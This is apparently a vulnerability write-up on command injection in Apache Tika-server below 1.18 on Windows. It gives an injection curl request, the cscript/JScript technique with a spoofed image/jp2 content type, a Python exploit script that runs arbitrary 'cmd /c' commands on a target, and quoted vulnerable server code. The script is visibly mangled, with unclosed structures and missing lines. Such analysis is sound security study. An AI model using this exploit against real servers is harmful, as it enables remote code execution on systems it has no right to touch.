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File metadata and controls

135 lines (102 loc) · 6.23 KB



Bug Overview: This bug leads to command injection vulnerability in Apache Tika -server < 1.18 and uses Cscript.exe to execute Jscript or VBS code and run arbitrary commands.

Environmental Setup

We downloaded the vulnerable version of the apache tika server in a windows 10 machine (running on azure windows 10 server instance) from and start the tika server with the following command .

java -jar tika-server-1.17.jar

Vulnerability and Exploit

Exploit-1: Arbitrary Command Execution

We are able to inject arbitrary commands to the tika server through specifically crafted header prefix X-Tika-OCRTesseractPath. This header specifies the path to the OCR Tesseract binary tesseract.exe but we can inject arbitrary commands through it using the fact that Windows ignores anything provided after double quotes.

The injection HTTP request looks something like

curl -T file_example_TIFF_1MB.tiff http://localhost:9998/meta --header "X-Tika-OCRTesseractPath: \"calc.exe\""  

The vulnerability is of command injection at tika-server and the entry point of the vulnerability is the HTTP headers.
The tika-server code handles the HTTP request by checking the header prefix. In case of HTTP request with "X-Tika-OCR" prefix, the server code invokes processHeaderConfig() function which parses the HTTP request and constructs the TesseractOCRConfig object.
The doOCR() function then uses the TesseractOCRConfig object to construct the command for ProcessBuilder. However, the doOCR() function while constructing the command appends the OCRTesseractPath (i.e. the passed calc.exe) with tesseract.exe.
The resultant command looks like "calc.exe"tesseract.exe ...". But since Windows ignores whatever is appened to it after the quotes, we are able to execute just our injected command calc.exe.

The command constructed by the doOCR() function is as follows.

"calc.exe"tesseract.exe <input.tmp> <output.tmp> -l eng -psm 1 txt -c preserve_interword_spaces=0

Exploit-2: JScript Execution

The first temp file passed to the command is the input file uploaded. Thus we could fill the input file with some code and have it executed. However, the problem is the extension of the file is ".tmp". Also, uploading an image file with some code would due to verification of the magic bytes of the image. The work around is to use Cscript that takes the first argument as the script and allows to use "//E:engine" flag to specify the script engine so that the file extension does not matter. Also, setting the content type to "image/jp2" forces the tika-sever not to verify the magic bytes in the image. This allows an image file containing JScript/VBScript to be uploaded and executed on the server.

The new command would now look like

"cscript.exe"tesseract.exe <input.tmp> <output.tmp> -l //E:Jscript -psm 1 txt -c preserve_interword_spaces=0

This is exploited in Exploit-2 code.

#!/usr/bin/env python  

import sys 
import requests

host = sys.argv[1]
port = sys.argv[2]
cmd = sys.argv[3]

url = host+":"+str(port)+"/meta"

headers = {"X-Tika-OCRTesseractPath": "\"cscript\"", 
		"X-Tika-OCRLanguage": "//E:Jscript", 
		"Expect": "100-continue", 
		"Content-type": "image/jp2", 
		"Connection": "close"

jscript='''var shellObj = WScript.CreateObject("WScript.Shell");
var execCmd = shellObj.Exec('cmd /c {}');'''.format(cmd)

        requests.put("https://"+url, headers=headers, data=jscript, verify=False)
		requests.put("http://"+url, headers=headers, data=jscript)
		print "Something went wrong."

Analysis of Server Code Snippets

public static final String X_TIKA_OCR_HEADER_PREFIX = "X-Tika-OCR"; 	// HTTP header prefix

public static void fillParseContext(ParseContext parseContext, MultivaluedMap<String, String> httpHeaders,
                                        Parser embeddedParser) {
TesseractOCRConfig ocrConfig = null;
for (String key : httpHeaders.keySet()) {
        if (StringUtils.startsWith(key, X_TIKA_OCR_HEADER_PREFIX)) {
        ocrConfig = (ocrConfig == null) ? new TesseractOCRConfig() : ocrConfig;
        // Parses HTTP headers and constructs TesseractOCRConfig object
        processHeaderConfig(httpHeaders, ocrConfig, key, X_TIKA_OCR_HEADER_PREFIX);	
        } else if (StringUtils.startsWith(key, X_TIKA_PDF_HEADER_PREFIX)) {
        pdfParserConfig = (pdfParserConfig == null) ? new PDFParserConfig() : pdfParserConfig;
        processHeaderConfig(httpHeaders, pdfParserConfig, key, X_TIKA_PDF_HEADER_PREFIX);  

private void parse(TikaInputStream tikaInputStream, File tmpOCROutputFile, ParseContext parseContext,
                       XHTMLContentHandler xhtml, TesseractOCRConfig config)
        // Uses TesseractOCRConfig object constructed with processHeaderConfig
        doOCR(tmpFile, tmpOCROutputFile, config);	

private void doOCR(File input, File output, TesseractOCRConfig config) throws IOException, TikaException {

// Construction of command string using TesseractPath
ArrayList<String> cmd = new ArrayList<>(Arrays.asList(
        config.getTesseractPath() + getTesseractProg(), input.getPath(),  output.getPath(), "-l",
        config.getLanguage(), "--psm", config.getPageSegMode()

for (Map.Entry<String, String> entry : config.getOtherTesseractConfig().entrySet()) {
        cmd.add(entry.getKey() + "=" + entry.getValue());
        "-c", "page_separator=" + config.getPageSeparator(),
        (config.getPreserveInterwordSpacing())? "preserve_interword_spaces=1" : "preserve_interword_spaces=0",
ProcessBuilder pb = new ProcessBuilder(cmd);
setEnv(config, pb);
final Process process = pb.start(); // Command execution